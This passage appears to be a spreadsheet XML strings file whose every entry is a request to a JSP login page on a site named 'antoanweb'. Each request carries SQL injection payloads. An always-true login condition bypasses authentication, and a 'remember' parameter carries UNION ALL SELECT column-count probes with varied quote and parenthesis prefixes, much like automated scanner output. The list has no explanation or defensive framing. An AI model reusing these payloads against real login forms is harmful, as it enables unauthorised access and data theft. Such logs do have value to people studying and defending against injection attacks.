    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873,1873--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352,7352--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608,3608--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915,9915--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492,5492--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516,2516--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419,419--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533,7533--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241,1241--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879,9879--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902,2902--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008,3008--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684,3684--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488,9488--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567,2567--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283,2283--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281,2281--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437--and(7199=7199&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603--and(745=745&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799,7799--and(9840=9840&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503,6503--and(2834=2834&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872,1872--and(9281=9281&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625,3625--and(6228=6228&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361--and(8564=8564&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667,5667--and(234=234&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455,9455--and(5212=5212&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624,9624--and(8434=8434&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831,8831--and((5727=5727&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137,3137--and((534=534&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395,395--and((1058=1058&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031,7031--and((3647=3647&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970,970--and((6078=6078&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901,9901--and((3385=3385&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853,7853--and((534=534&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395,8395--and((3576=3576&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135,7135--and((7391=7391&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738,6738--and((5964=5964&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399,5399--and(((9291=9291&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510--and(((9603=9603&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402,7402--and(((779=779&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966,6966--and(((1150=1150&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617,4617--and(((5541=5541&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955,8955--and(((4559=4559&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720,4720--and(((5899=5899&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925,7925--and(((849=849&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230,2230--and(((6033=6033&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302,8302--and(((776=776&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761,2761--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074,8074--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015,3015--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821,3821--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984,3984--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929,4929--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817,3817--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177,8177--and('cduf'='cduf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453,6453--and('aqlf'='aqlf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878,1878--and('sqgh'='sqgh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291,7291--and('bhtp'='bhtp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531,2531--and('kidz'='kidz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492--and('yzuv'='yzuv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042,5042--and('xmiu'='xmiu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141,4141--and('xhbf'='xhbf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470,470--and('bfuy'='bfuy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895,8895--and('bzea'='bzea&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867,8867--and(('aojj'='aojj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221,2221--and(('eovd'='eovd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474,5474--and(('yhve'='yhve&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541,2541--and(('gqby'='gqby&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638,8638--and(('wkhg'='wkhg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704,6704--and(('vais'='vais&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067,7067--and(('piik'='piik&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240,4240--and(('bjwp'='bjwp&amp;modo=entrar</t>
  </si>
  <si>
